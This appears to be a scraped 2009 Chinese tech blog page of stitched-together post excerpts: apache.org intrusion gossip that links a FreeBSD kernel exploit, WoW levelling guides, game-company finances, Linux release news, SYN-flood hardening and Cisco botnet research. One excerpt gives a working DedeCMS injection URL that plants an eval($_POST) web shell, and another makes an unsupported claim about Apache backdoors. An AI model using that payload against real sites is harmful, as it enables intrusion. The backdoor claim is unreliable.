细节可以看下,黑客是如何在没有root权限的情况下从一个服务器跳到另外的服务器的。apache.org号称 黑客没有跳出环境,代码也没有受到影响,但我表示怀疑,apache.org用的fbsd7-stable的内核,但milw0rm上有个bsd- ktimer.c http://www.milw0rm.com/exploits/8261 , 还不知道这exp好用不,说不定黑客故意deface,然后让apache的人以为仅仅是deface。。。。其实已经root了。不过话说 apache.org的好些早都被国外某黑客组织给root了,并在apache代码里留下了逻辑后门,也不差这一次了,反正大家该用还是继续用。
阅读全文...
在这个青黄不接的时候,无聊翻图时发现以前练锻造时冲上375时的截图
正好保存当时了练锻造时的记录,发上来大家看看,选的武器专精
萨满练级主加增强系,因为风怒很好很强大。不过元素练级也未尝不可,只是比较吃装备没有什么普遍性,这里以增强练级为例简单的介绍萨满的练级路。
1~29级(风怒出来之前):
1~30级之间萨满的主要攻击手段是闪电开怪然后近战。现在萨满一出生就可以学习使用双手武器(斧、锤)。这样看上去选择双手武器应该是很好的选择,其实不然。在低级阶段双手武器和单手武器之间的差别并不是非常巨大。快速单手武器攻击次数更多带来更多的暴击几率以触发乱舞和专注。而盾牌可以减免更多的伤害,减少坐地板的时间。所以在低级的时候我更加倾向于使用快速单手+盾牌的组合。武器附魔的话 石化 火舌 冰封 大同小异,依各人喜好调整。
10级左右部落萨满可以通过初级副本怒焰裂谷的任务获得不错的单手锤或双手斧。联盟萨满则可以通过任务链获得[[阿古斯之手]]。
20级左右的时候,影牙城堡里[[屠夫的切肉刀]。是一把不错的武器。联盟则可以在死亡矿井里刷刷[[重拳先生的战斧]]。
而装备的话,如果选择了制皮专业。做一套盗贼敏耐皮甲是不错的选择。不过现在升级快,装备更新也快。平时注意AH里的力敏皮甲拍卖就可以。部落的蓝色三件套:[[野人护腕]]、[[蛇鳞腰带]]、[[战歌长靴]]。有能力就去搞,还是可以用很长一段时间的。
天赋方面,先祖知识在即将到来的修改中会改为提升智力10%,结合后期的精神迅捷天赋,整体提升比较大。雷鸣猛击提升5%暴击不用多说。萨满专注,元素武器,乱舞。这些都是必加天赋。加完了就到30级了。
阅读全文...
2009年2月27日,盛大公布了其截止到2008年12月31日的第四季度及全年财报。当时《AION》还没公测,所以你应该很久都没听说盛大有哪款新游戏的在线超过60万了,——再干脆点说,盛大很长时间里都没有一款大获成功的网络游戏了。
但尽管如此,你依旧会在盛大的财报中看到这样一组恐怖的数字:
盛大旗下仅休闲游戏的活跃付费帐号数就高达150万。——这一数字有多恐怖?对比一下你就知道了:完美时空的活跃付费帐号数是154.6万,巨人的活跃付费帐号数是129万。——我承认这是一个不公平的对比,公平的比法是:盛大旗下MMORPG的活跃付费帐号数为589万。
让我们把时间再往回倒推一年:
2007年第四季度,盛大旗下MMORPG的活跃付费帐号数为347万;完美时空的活跃付费帐号数是156.5万;巨人的活跃付费帐号数是140.5万。
前言、
每个做互联网的人都知道腾讯恐怖;
每个玩网游戏的人都讨论《魔兽世界》易主;
每个搞研发的人都不停抄袭《征途》。
要我说,
你们都该给盛大一点关注。
阅读全文...
新闻来源:LinuxToy
在跳票一个星期后,Magic Linux开发团队放出了 Magic Linux 2.5 的第二个 Beta 版本以供用户测试。Magic Linux 2.5 Beta 2 包含 Kernel 2.6.30.5、Glibc 2.10.1、GCC 4.4.0、X.Org 1.6.3、KDE 4.3.0 等主要组件。根据 Magic Linux 2.5 Beta 2 发布公告显 示,该版本除了对系统软件和仓库进行更新之外,还修正了安装程序在有读卡器的机器上无法启动、Java 中文字体配置、Fcitx 不能启动、仓库配置、Phonon 声卡独占、Konsole 字体显示、Strigi 和 Nepomukserver 在关闭桌面搜索时仍然启动、K 帮助中心左侧树形索引中文乱码等多个问题。
阅读全文...
新闻来源:LinuxToy
Slackware Linux 这个老牌的 Linux 发行版在今天推出了 13.0 正式版本。新版本不仅对重要组件进行了升级,而且增加了新的 .txz 包格式。
自 Slackware Linux 12.2 以来,该版本主要包含以下更新:
据国外媒体报道,美国通讯业工人协会(Communications Workers of America)近日发布的网速调查报告显示,韩国互联网网速在全球居首位,平均传输速率达20.4兆位/秒;日本次之,为15.8兆位/秒;瑞典 12.8兆位/秒,排名第三.而中国则远远落后于其他先进国家,排在第71位,平均速率只有1.774兆位/秒.统计数据表明,韩国和日本是平均网速最快的地区.近年来,韩国和日本网络技术发展迅速,每年均保持20%以上的飞速增长.韩国去年投入1.3亿韩元建设百兆网络,并打算到2010年,实现1000万户居民通宽带,普及率近90%.
中国大陆平均传输速率仅1.774兆位/秒,排在第71位.下载速度为2.37兆位/秒,上传速度为1.18兆位/秒.
据测算,韩国的网速为中国的11.5倍,日本也几乎达到中国的9倍.
作者:张恒
dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究。利用此漏洞进行违法活动者,后果自负。
假设域名是:www.abc.com 攻击步骤如下:
1. 访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见以下错误信息:
摘要:本章仅从基础层面对黑客攻击的一些主要方面进行介绍,如了解黑客攻击的类型和主要攻击方式,端口和漏洞扫描,以及在Windows 2000/Server 2003系统下针对拒绝服务攻击所进行的TCP协议深层配置。本文是全面抵御SYN攻击.
全面抵御SYN攻击
SYN攻击利用了TCP/IP连接建立机制中的安全漏洞。要实施SYN洪水攻击,攻击者会使用程序发送大量的TCP SYN请求,来填满服务器上的挂起连接队列。这会禁止其他用户建立网络连接。要保护网络免遭SYN攻击,只需按以下这些通用步骤操作即可。
(1)启用SYN攻击保护。
(2)设置SYN保护阈值。
(3)设置其他保护。
本节及后面所介绍的注册表配置方法同样适用于Windows 2000和Windows Server 2003系统。
阅读全文...
首先说明,本指南只适用于以做任务升级为主的玩家,组人一起刷副本或者找大号带练等都不在考虑范围内。1-58级的升级过程已经被暴雪简化了很多次,所以自己做任务练级并不会很慢。至于纯刷怪练级,也许在低等级的时候不错,但三十级以后就已经赶不上做任务的速度了。
本指南也只会涉及德鲁伊这个职业的相关内容,各职业通用的升级问题,比如升级路线、赚钱方法等不会过多讨论。
因为国服和台服的翻译有些不同,野德的一些技能尤其容易混淆,所以这里说明一下:当同一个技能或物品在国服和台服翻译不同时,会用这样的格式表示:裂伤[割碎]。“裂伤”是国服的翻译,方括号里的“割碎”则是台服的翻译。
在开始之前还要说明的是:没有绝对的“最快练级方法、练级天赋”,每个人的情况都会有不同,本帖也只能做到尽量适合大多数人。如果你对本篇的某些地方有不同的意见或觉得需要补充,欢迎一起讨论完善这个指南。我也会尽量在德鲁伊这个职业有相关改动的时候更新本帖,保持这个帖子的时效性。
阅读全文...
cisco安全情报中心发 的一个文章,原文标题是“Infiltrating a Botnet”,为了照顾各位的用户体验,我翻译成“渗透一个肉鸡网络”:)大致看了下,应该是伪装成肉鸡进入server,然后窃听肉鸡老板相关交易信 息的一个过程,挺有意思,相信玩bot的朋友在很久以前就中过这种道。
Many teams at Cisco are dedicated to security research. One team recently investigated botnets with the goal of improving existing detection methods and discovering the techniques botmasters use to compromise machines. The team’s efforts were rewarded through their protection of an important customer’s network. Their discovery efforts also yielded extraordinary insights into the mind and motives of a botmaster. This paper discusses exploit protection and reports on the interviews the team held with the botmaster they encountered.
Typically, administrators patch vulnerable machines or deploy some sort of intrusion prevention system (IPS) to protect against exploits. Both approaches are effective the majority of the time, but neither approach protects systems against the uneducated user. These approaches may not even protect people who take their machines home if the IPS is network-based. The user who will click and run anything is the greatest threat to any network.
Internet relay chat (IRC) traffic on non-standard ports is a good indicator of malicious activity. Simple botnets often use IRC as a command-and-control framework because the source code is readily available. Joining a chat network is not botnet activity, but it is usually not work-appropriate activity. Cisco offers a service that monitors and manages network-based IPS. By monitoring certain alerts from this data feed, suspicious IRC traffic was easily found.
A Cisco customer was unaware of dozens of compromised machines. A tremendous number of alerts including IRC activity, far larger than anything that could be benign, were occurring on the customer’s network. The traffic from several machines stood out from other systems on the network. There are occasionally oddities in a network, but when a small subset of machines is observed sharing the same odd behavior, researchers should take note.
阅读全文...
是cisco的研究人员披露的肉鸡价格。阅读红色部分可以快速获得相关肉鸡价格和黑客收入信息。哪位可以给出国内肉鸡价格和黑客收入信息啊 :)转载开始。
Researchers at Cisco recently got a rare glimpse of the inner workings of the botnet underworld after going undercover and meeting an actual botmaster online: the botmaster, who ran a botnet that had infected dozens of machines at a Cisco customer site, said his main job is to compromise a few thousand machines and then sell them off in bulk.
He told a Cisco researcher posing as a fellow botmaster that the market rate for a bot is between 10 cents to 25 cents per machine, and that he recently made $800 off of a sale of 10,000 bots.
But that rate is likely a moving target, says Joe Dallatore, senior manager in Cisco’s security research and operations group. “At this point we have a snapshot [in time]” of the botnet market rate, Dallatore says. “There is an economy for these things, and it changes over time this is a form of commerce, with supply and demand.”
And the botmaster isn’t out to perform identity theft — just bot-brokering. “He was not in the business of using information [on the bots]. Just in creating bots and selling them to someone else,” Dallatore says.
Cisco decided to go undercover and learn more about the botnet market after cleaning up infected machines at their customer’s site. “This gave us an opportunity to learn what motivated” the botmaster, Dallatore says.
阅读全文...
姓名:Chinadu
性别:Man
职业:网络安全从业者
E-mail:imcto#msn.cn
近期评论